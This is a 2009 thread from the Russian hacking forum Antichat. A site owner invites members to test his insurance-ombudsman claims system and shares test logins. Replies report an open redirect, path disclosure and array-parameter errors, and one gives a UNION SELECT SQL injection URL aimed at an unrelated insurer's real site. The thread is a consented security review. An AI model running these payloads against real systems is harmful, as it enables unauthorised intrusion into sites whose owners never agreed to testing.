Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Проверка на уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=110)
-   -   Проверьте сайт (https://forum.antichat.xyz/showthread.php?t=147660)

atlantis 12.10.2009 12:59

Проверьте сайт
 
Вообщем системка, для урегулирования страховых споров.
url: insurance-ombudsman-doc.kz
url для входа в систему: insurance-ombudsman-doc.kz/workspace

тестовые акки:
oksana@oksana.com - исполнитель
omb@omb.kz - омбудсман
www.allianz.kz - ск

пароль такой же как логин.

системка самописная + расширения:
HTML_QuickForm
Smarty
pchart
phpids
lime_survey
memcached
bbcode

Каков принцип работы:
чел заходит на сайт insurance-ombudsman-doc.kz
подает заявление
дело отправляется СК. При выборе СК в подаче заявления выбирайте всегда `Allianz Kazakhstan`
СК заходит в систему insurance-ombudsman-doc.kz/workspace, урегулирует или не урегулирует ситуацию. Отправляется уведомление или омбудсману или заявителю, зависит от того что сделала СК и т.д. По ходу дела все станет понятным надеюсь.

Огромное спс всем участвующим.

DFrost 13.10.2009 14:07

Цитата:

http://insurance-ombudsman-doc.kz/workspace?rederict[]=
Пути
----------------------------------
Цитата:

http://insurance-ombudsman-doc.kz/workspace?rederict=http://www.google.ru
можно сделать редирект на любой сайт при вводе логина и пароля.(зачем оно нужно?)

W@r.N0i$e 13.10.2009 14:57

Раскрытие путей.
Перехватываем пакет.
В значение сессии вставляем что-то типа !@#$%^&*([].
Отправляем и получаем ошибку.
Код:

Warning: session_start() [function.session-start]: The session id contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in
/home/.../www/.../config.php

Так же есть подозрение на еще одну уязвимость, но для того чтобы проверить это, мне понадобится твоя помощь. Если согласен помочь, то пиши в личку.

atlantis 14.10.2009 07:15

Цитата:

можно сделать редирект на любой сайт при вводе логина и пароля.(зачем оно нужно?)
да действительно) зачем оно нужно? большое спс за то что порылись в системке. буду исправлять.


Цитата:

Так же есть подозрение на еще одну уязвимость, но для того чтобы проверить это, мне понадобится твоя помощь. Если согласен помочь, то пиши в личку.
Уже отписался в личку. Спс за найденный косяк.

HAXTA4OK 14.10.2009 11:01

SQL

http://www.allianz.kz/lang/ru/pages/-4+union+select+1,2,3,version(),5,6,7--

ps или я не тот url поверяю? :)

m0Hze 14.10.2009 11:57

Преобразуем имена переменных из самой первой формы в array, тобиж дописываем везде
name[]=
И получаем:
PHP код:


Warning
htmlspecialchars() expects parameter 1 to be string, array given in /path/*/Common.php on line 150

Warning: htmlspecialchars() expects parameter 1 to be string, array given in /path/*/
Common.php on line 150

Warning
htmlspecialchars() expects parameter 1 to be string, array given in /path/*/Common.php on line 150

Warning: htmlspecialchars() expects parameter 1 to be string, array given in /path/*/
Common.php on line 150

Warning
htmlspecialchars() expects parameter 1 to be string, array given in /path/*/Common.php on line 150

Warning: htmlspecialchars() expects parameter 1 to be string, array given in /path/*/
Common.php on line 150

Warning
htmlspecialchars() expects parameter 1 to be string, array given in /path/*/Common.php on line 150

Warning: htmlspecialchars() expects parameter 1 to be string, array given in /path/*/
Common.php on line 150

Warning
htmlspecialchars() expects parameter 1 to be string, array given in /path/*/Common.php on line 150 


m0Hze 14.10.2009 11:59

PHP код:

http://insurance-ombudsman-doc.kz/workspace?rederict[]=/SESSION 


m0Hze 14.10.2009 12:02

PHP код:

http://insurance-ombudsman-doc.kz/workspace?rederict& 

email[]=&password[]=&submit=%D0%92%D0%BE%D0%B9%D1%82%D0%B8 - POST
Опять же,это везде,банальное []

atlantis 14.10.2009 12:50

Цитата:

SQL

http://www.allianz.kz/lang/ru/pages/-4+union+select+1,2,3,version(),5,6,7--

ps или я не тот url поверяю?
к сожалению не тот.

Цитата:

PHP код:
http://insurance-ombudsman-doc.kz/workspace?rederict&

email[]=&password[]=&submit=%D0%92%D0%BE%D0%B9%D1%82%D0%B8 - POST
Опять же,это везде,банальное []
спс. оставил на заметку. будем исправлять.

m0Hze 14.10.2009 15:22

http://insurance-ombudsman-doc.kz/getExecutorMenu.php

PHP код:

id=-12222
id
[]=
id=1
id
=15

И в том-же духе.


Время: 11:40